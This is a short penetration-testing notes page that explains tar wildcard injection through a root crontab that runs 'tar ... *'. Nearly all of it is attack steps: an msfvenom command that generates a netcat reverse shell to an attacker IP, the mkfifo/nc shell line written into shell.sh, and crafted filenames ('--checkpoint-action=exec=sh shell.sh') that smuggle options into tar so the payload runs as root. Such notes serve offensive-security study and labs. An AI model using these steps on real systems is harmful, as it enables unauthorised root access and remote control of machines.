Wildcard Injection

Tar wildcard Injection

Abusing crontab wildcard

Let's say we encounter the following crontab:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

This type of situation is an error made by the creator of the crontab. This command try to extract every file in the current directory.

Exploitation

We can exploit this by creating filenames that are tar commands:

Create netcat reverse shell:

kali@kali$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.45.194 LPORT=7777

Payload size: 104 bytes
mkfifo /tmp/kghpgks; nc 192.168.45.194 7777 0</tmp/kghpgks | /bin/sh >/tmp/kghpgks 2>&1; rm /tmp/kghpgks

Adding malicious filenames

victim@box:/opt/admin$ echo "mkfifo /tmp/kghpgks; nc 192.168.45.194 7777 0</tmp/kghpgks | /bin/sh >/tmp/kghpgks 2>&1; rm /tmp/kghpgks" >> shell.sh

victim@box:/opt/admin$ echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint-action=exec=sh shell.sh"

victim@box:/opt/admin$ echo "" > --checkpoint=1
echo "" > --checkpoint=1

total 20
drwxr-xr-x 2 victim victim 4096 Jan 15 21:39 .
drwxr-xr-x 3 root   root   4096 Nov  2  2022 ..
-rw-rw-r-- 1 victim victim    1 Jan 15 21:39 --checkpoint=1
-rw-rw-r-- 1 victim victim    1 Jan 15 21:39 --checkpoint-action=exec=sh shell.sh
-rw-rw-r-- 1 victim victim  105 Jan 15 21:38 shell.sh

Success!

The resulting command now runs:

CMD: UID=0     PID=28068  | tar -zxf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh
PreviousEscaping JailNextExploiting Microsoft Office

Last updated